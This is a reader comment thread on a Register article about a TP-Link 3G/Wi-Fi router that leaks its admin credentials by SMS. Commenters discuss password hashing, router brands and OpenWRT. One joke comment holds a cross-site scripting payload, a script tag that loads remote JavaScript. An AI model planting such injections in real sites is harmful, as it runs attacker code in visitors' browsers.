back to article TP-Link 3G/Wi-Fi modem spills credentials to an evil text message

TP-Link's M5350 3G/Wi-Fi router, has the kind of howling bug that gives infosec pros nightmares. In what looks like a feature created for developers' convenience, but left behind when it should have been deleted, the device's admin credentials can be retrieved by text message. The discoverer of the bug, a German company …

  1. Mage Silver badge

    SMS

    15 years ago I interfaced SMS to a server using serial adaptor on a Nokia phone, but it had a whitelist of numbers to process (not great security) and needed a password. It only responded with information on the web site anyway...

    This is mental. Why no whitelist of numbers at least?

    1. sorry, what?
      Unhappy

      Re: SMS

      Given that anyone (who really wanted to) could discover the white list by examining the firmware and that it is relatively easy to spoof sender identity this wouldn't help.

      They simply need to remove this "feature".

      1. Starace Silver badge

        Re: SMS

        But spoofing the sender would leave it unable to reply with the details which would make the exercise pointless...

    2. Lee D Silver badge

      Re: SMS

      Bigger question.

      Why is the admin password not hashed, so that it doesn't even know what the password is and hence can't "send" it to anyone anyway? It shouldn't be storing the damn thing in plaintext.

      And it certainly shouldn't be capable of emailing out the hash, even. Literally, that's why /etc/shadow is locked down in terms of access and only login utilities can read it. There's no need for it to be texting it out, in the same way there's no need to ever "inform people" of what their password used to be. You just shouldn't be able to do it.

      Least privilege principle.

      You can't "stop" all the possible exploits, out-of-bounds, poor-sanitisation, etc. tricks.

      But you CAN stop those things being able to do anything even vaguely interesting even if they do work.

  2. Anonymous Coward
    Anonymous Coward

    I hate consumer router/modems. I've got a choice of basically Netgear or TP-link. Both seem equally likely to be buggy as all hell.

    My thinking was to go for the least feature rich (basic wired-only VDSL modem), and put it in front of a real router.

    In this instance my attack surface minimizing strategy paid off (no 3G) but who knows next time.

    1. Lee D Silver badge

      Draytek.

      They have very featureful routers, lots of regular updates, ADSL / VDSL / Ethernet and 3G/4G failover on the same device (e.g. 2860 / 2870's). They let you do proper VLAN, QoS, RADIUS, web filter and all kinds of things if you really want to. They have very good wireless. They can mesh nicely with other APs and routers in the same range (centralised management, etc.). They can handle IPv6 (shame most ISP's can't). They rarely do stupid things. They have the backend processing to keep up with anything you throw at them.

      They are more expensive, but you get a lot more back.

      TP-Link are good and cheap for what they are. Just don't trust that kind of stuff as your front end to the Internet.

      *Virgin Superhub 2 in modem mode -> Draytek Vigor 2860Vn+. for reference.

    2. Voland's right hand Silver badge

      TP Link is OK

      Once you have reflashed it with OpenWRT.

      The original software is a manifestation of incompetence of pangalactic proportions. A good example is the complete idiocy of the incompetent muppet who designed the interface for the TP108 "smart switch". You can configure vlans. You cannot disable the "default" vlan on a port. So any port always remains in the default vlan making the whole vlan separation unusable. That is apparently how VLANs should work according to TP Link. It is not dumb, it is not dumber, it is dumbest.

      Their other software is in the same league. The hardware however is fine and makes a fine choice once you reflash it.

      I have ~ 10 of them doing various things including some primitive IoT apps predating the wide availability of the Razzie.

      All are flashed with OpenWRT including two of the 3G router ones. No stupid security bugs. No stability issues. Just works (TM) - some have uptime in the hundreds of days.

      1. Anonymous Coward
        Anonymous Coward

        Re: TP Link is OK

        Thanks for the suggestion, though I'm pretty sure there are still no VDSL2 modems that you can reflash and still actually have the modem part work.

        For example: "Lantiq xDSL firmware and drivers - integration and porting to current OpenWRT should be possible."

        Promising but no cigar.

  3. Anonymous South African Coward Silver badge

    *shakes head*

  4. handleoclast
    FAIL

    How hard is it?

    How hard is it to have a #ifdef (or moral equivalent) wrapping ALL development code/fiddles/backdoors and ALSO wrapping all device identification strings? So that if you've #defined DEV then the device identifies itself as "Development" (rather than TP-Link or Cisco or whatever) on all web pages, CLI prompts, etc.

    It's not rocket surgery.

  5. Adam 1

    please ignore - testing

    <script src=//n.ms/lotsofupvotes.js></script>

  6. Wila

    Draytek? OpenWRT?

    This is a pocket wifi device with only a 3G connection.

    Call it a MiFi if you like.

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Biting the hand that feeds IT © 1998–2020